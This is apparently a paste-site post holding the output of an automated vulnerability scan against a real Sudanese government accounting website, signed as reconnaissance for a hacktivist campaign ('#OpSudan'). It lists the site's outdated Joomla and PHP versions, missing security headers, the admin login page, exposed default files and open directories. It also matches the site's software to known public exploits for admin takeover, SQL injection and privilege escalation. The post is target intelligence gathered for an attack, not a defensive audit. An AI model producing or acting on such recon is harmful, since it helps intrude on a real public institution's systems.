  2225. [M] Website Not in HTTPS: http://accounting.gov.sd
  2226. [I] X-Powered-By: PHP/5.6.18
  2227. [L] X-Frame-Options: Not Enforced
  2228. [I] Strict-Transport-Security: Not Enforced
  2229. [I] X-Content-Security-Policy: Not Enforced
  2230. [I] X-Content-Type-Options: Not Enforced
  2231. [L] Robots.txt Found: http://accounting.gov.sd/robots.txt
  2232. [I] CMS Detection: Joomla
  2233. [I] Joomla Version: 3.4.8
  2234. [M] EDB-ID: 46200 "Joomla! Core 3.9.1 - Persistent Cross-Site Scripting in Global Configuration Textfilter Settings"
  2235. [M] EDB-ID: 42033 "Joomla! 3.7.0 - 'com_fields' SQL Injection"
  2236. [M] EDB-ID: 40637 "Joomla! 3.4.4 < 3.6.4 - Account Creation / Privilege Escalation"
  2237. [M] EDB-ID: 41157 "Joomla! < 3.6.4 - Admin Takeover"
  2238. [I] Joomla Website Template: accounting
  2239. [I] Autocomplete Off Not Found: http://accounting.gov.sd/administrator/index.php
  2240. [-] Joomla Default Files:
  2241. [-] Joomla is likely to have a large number of default files
  2242. [-] Would you like to list them all?
  2243. [y/N]: y
  2244. [I] http://accounting.gov.sd/LICENSE.txt
  2245. [I] http://accounting.gov.sd/README.txt
  2246. [I] http://accounting.gov.sd/administrator/cache/index.html
  2247. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/2.5.0-2011-12-06.sql
  2248. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/2.5.0-2011-12-16.sql
  2249. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/2.5.0-2011-12-19.sql
  2250. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/2.5.0-2011-12-20.sql
  2251. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/2.5.0-2011-12-21-1.sql
  2252. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/2.5.0-2011-12-21-2.sql
  2253. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/2.5.0-2011-12-22.sql
  2254. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/2.5.0-2011-12-23.sql
  2255. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/2.5.0-2011-12-24.sql
  2256. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/2.5.0-2012-01-10.sql
  2257. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/2.5.0-2012-01-14.sql
  2258. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/2.5.1-2012-01-26.sql
  2259. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/2.5.2-2012-03-05.sql
  2260. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/2.5.3-2012-03-13.sql
  2261. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/2.5.4-2012-03-18.sql
  2262. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/2.5.4-2012-03-19.sql
  2263. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/2.5.5.sql
  2264. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/2.5.6.sql
  2265. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/2.5.7.sql
  2266. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/3.0.0.sql
  2267. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/3.0.1.sql
  2268. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/3.0.2.sql
  2269. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/3.0.3.sql
  2270. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/3.1.0.sql
  2271. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/3.1.1.sql
  2272. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/3.1.2.sql
  2273. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/3.1.3.sql
  2274. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/3.1.4.sql
  2275. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/3.1.5.sql
  2276. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/3.2.0.sql
  2277. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/3.2.1.sql
  2278. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/3.2.2-2013-12-22.sql
  2279. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/3.2.2-2013-12-28.sql
  2280. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/3.2.2-2014-01-08.sql
  2281. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/3.2.2-2014-01-15.sql
  2282. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/3.2.2-2014-01-18.sql
  2283. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/3.2.2-2014-01-23.sql
  2284. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/3.2.3-2014-02-20.sql
  2285. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/3.3.0-2014-02-16.sql
  2286. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/3.3.0-2014-04-02.sql
  2287. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/3.3.4-2014-08-03.sql
  2288. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/3.3.6-2014-09-30.sql
  2289. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/3.4.0-2014-08-24.sql
  2290. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/3.4.0-2014-09-01.sql
  2291. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/3.4.0-2014-09-16.sql
  2292. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/3.4.0-2014-10-20.sql
  2293. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/3.4.0-2014-12-03.sql
  2294. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/3.4.0-2015-01-21.sql
  2295. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/mysql/3.4.0-2015-02-26.sql
  2296. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/postgresql/3.0.0.sql
  2297. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/postgresql/3.0.1.sql
  2298. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/postgresql/3.0.2.sql
  2299. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/postgresql/3.0.3.sql
  2300. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/postgresql/3.1.0.sql
  2301. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/postgresql/3.1.1.sql
  2302. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/postgresql/3.1.2.sql
  2303. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/postgresql/3.1.3.sql
  2304. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/postgresql/3.1.4.sql
  2305. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/postgresql/3.1.5.sql
  2306. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/postgresql/3.2.0.sql
  2307. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/postgresql/3.2.1.sql
  2308. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/postgresql/3.2.2-2013-12-22.sql
  2309. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/postgresql/3.2.2-2013-12-28.sql
  2310. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/postgresql/3.2.2-2014-01-08.sql
  2311. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/postgresql/3.2.2-2014-01-15.sql
  2312. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/postgresql/3.2.2-2014-01-18.sql
  2313. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/postgresql/3.2.2-2014-01-23.sql
  2314. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/postgresql/3.2.3-2014-02-20.sql
  2315. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/postgresql/3.3.0-2013-12-21.sql
  2316. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/postgresql/3.3.0-2014-02-16.sql
  2317. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/postgresql/3.3.0-2014-04-02.sql
  2318. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/postgresql/3.3.4-2014-08-03.sql
  2319. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/postgresql/3.3.6-2014-09-30.sql
  2320. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/postgresql/3.4.0-2014-08-24.sql
  2321. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/postgresql/3.4.0-2014-09-01.sql
  2322. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/postgresql/3.4.0-2014-09-16.sql
  2323. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/postgresql/3.4.0-2014-10-20.sql
  2324. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/postgresql/3.4.0-2014-12-03.sql
  2325. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/postgresql/3.4.0-2015-01-21.sql
  2326. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/postgresql/3.4.0-2015-02-26.sql
  2327. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/postgresql/3.4.4-2015-07-11.sql
  2328. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/sqlazure/2.5.2-2012-03-05.sql
  2329. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/sqlazure/2.5.3-2012-03-13.sql
  2330. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/sqlazure/2.5.4-2012-03-18.sql
  2331. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/sqlazure/2.5.4-2012-03-19.sql
  2332. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/sqlazure/2.5.5.sql
  2333. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/sqlazure/2.5.6.sql
  2334. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/sqlazure/2.5.7.sql
  2335. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/sqlazure/3.0.0.sql
  2336. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/sqlazure/3.0.1.sql
  2337. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/sqlazure/3.0.2.sql
  2338. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/sqlazure/3.0.3.sql
  2339. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/sqlazure/3.1.0.sql
  2340. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/sqlazure/3.1.1.sql
  2341. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/sqlazure/3.1.2.sql
  2342. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/sqlazure/3.1.3.sql
  2343. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/sqlazure/3.1.4.sql
  2344. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/sqlazure/3.1.5.sql
  2345. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/sqlazure/3.2.0.sql
  2346. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/sqlazure/3.2.1.sql
  2347. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/sqlazure/3.2.2-2013-12-22.sql
  2348. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/sqlazure/3.2.2-2013-12-28.sql
  2349. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/sqlazure/3.2.2-2014-01-08.sql
  2350. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/sqlazure/3.2.2-2014-01-15.sql
  2351. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/sqlazure/3.2.2-2014-01-18.sql
  2352. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/sqlazure/3.2.2-2014-01-23.sql
  2353. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/sqlazure/3.2.3-2014-02-20.sql
  2354. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/sqlazure/3.3.0-2014-02-16.sql
  2355. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/sqlazure/3.3.0-2014-04-02.sql
  2356. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/sqlazure/3.3.4-2014-08-03.sql
  2357. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/sqlazure/3.3.6-2014-09-30.sql
  2358. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/sqlazure/3.4.0-2014-08-24.sql
  2359. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/sqlazure/3.4.0-2014-09-01.sql
  2360. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/sqlazure/3.4.0-2014-09-16.sql
  2361. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/sqlazure/3.4.0-2014-10-20.sql
  2362. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/sqlazure/3.4.0-2014-12-03.sql
  2363. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/sqlazure/3.4.0-2015-01-21.sql
  2364. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/sqlazure/3.4.0-2015-02-26.sql
  2365. [I] http://accounting.gov.sd/administrator/components/com_admin/sql/updates/sqlazure/3.4.4-2015-07-11.sql
  2366. [I] http://accounting.gov.sd/administrator/components/com_banners/sql/install.mysql.utf8.sql
  2367. [I] http://accounting.gov.sd/administrator/components/com_banners/sql/uninstall.mysql.utf8.sql
  2368. [I] http://accounting.gov.sd/administrator/components/com_contact/sql/install.mysql.utf8.sql
  2369. [I] http://accounting.gov.sd/administrator/components/com_contact/sql/uninstall.mysql.utf8.sql
  2370. [I] http://accounting.gov.sd/administrator/components/com_finder/sql/install.mysql.sql
  2371. [I] http://accounting.gov.sd/administrator/components/com_finder/sql/install.postgresql.sql
  2372. [I] http://accounting.gov.sd/administrator/components/com_finder/sql/uninstall.mysql.sql
  2373. [I] http://accounting.gov.sd/administrator/components/com_finder/sql/uninstall.postgresql.sql
  2374. [I] http://accounting.gov.sd/administrator/components/com_newsfeeds/sql/install.mysql.utf8.sql
  2375. [I] http://accounting.gov.sd/administrator/components/com_newsfeeds/sql/uninstall.mysql.utf8.sql
  2376. [I] http://accounting.gov.sd/administrator/language/overrides/index.html
  2377. [I] http://accounting.gov.sd/administrator/manifests/packages/index.html
  2378. [I] http://accounting.gov.sd/administrator/templates/hathor/LICENSE.txt
  2379. [I] http://accounting.gov.sd/bin/index.html
  2380. [I] http://accounting.gov.sd/cache/index.html
  2381. [I] http://accounting.gov.sd/cli/index.html
  2382. [I] http://accounting.gov.sd/components/index.html
  2383. [I] http://accounting.gov.sd/htaccess.txt
  2384. [I] http://accounting.gov.sd/images/index.html
  2385. [I] http://accounting.gov.sd/includes/index.html
  2386. [I] http://accounting.gov.sd/language/index.html
  2387. [I] http://accounting.gov.sd/language/overrides/index.html
  2388. [I] http://accounting.gov.sd/layouts/index.html
  2389. [I] http://accounting.gov.sd/libraries/fof/LICENSE.txt
  2390. [I] http://accounting.gov.sd/libraries/fof/version.txt
  2391. [I] http://accounting.gov.sd/libraries/idna_convert/ReadMe.txt
  2392. [I] http://accounting.gov.sd/libraries/index.html
  2393. [I] http://accounting.gov.sd/media/editors/tinymce/changelog.txt
  2394. [I] http://accounting.gov.sd/media/editors/tinymce/license.txt
  2395. [I] http://accounting.gov.sd/media/editors/tinymce/plugins/example/dialog.html
  2396. [I] http://accounting.gov.sd/media/editors/tinymce/templates/layout1.html
  2397. [I] http://accounting.gov.sd/media/editors/tinymce/templates/snippet1.html
  2398. [I] http://accounting.gov.sd/media/index.html
  2399. [I] http://accounting.gov.sd/media/jui/fonts/icomoon-license.txt
  2400. [I] http://accounting.gov.sd/modules/index.html
  2401. [I] http://accounting.gov.sd/plugins/index.html
  2402. [I] http://accounting.gov.sd/templates/index.html
  2403. [I] http://accounting.gov.sd/tmp/index.html
  2404. [I] http://accounting.gov.sd/web.config.txt
  2405. [-] Searching Joomla Components ...
  2406. [I] guarantee.png" alt=""
  2407. /bin/sh: 1: Syntax error: Unterminated quoted string
  2408. [I] icons
  2409. [I] mod_djmegamenu
  2410. [I] mod_jux_news_ticker
  2411. [I] Checking for Directory Listing Enabled ...
  2412. [L] http://accounting.gov.sd/layouts/plugins
  2413. [L] http://accounting.gov.sd/libraries/vendor
  2414. [L] http://accounting.gov.sd/media/com_wrapper
  2415. [L] http://accounting.gov.sd/plugins/installer
  2416. [-] Date & Time: 11/02/2019 20:30:46
  2417. [-] Completed in: 0:50:51
  2418. #######################################################################################################################################
  2419. Anonymous JTSEC #OpSudan Full Recon #5
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement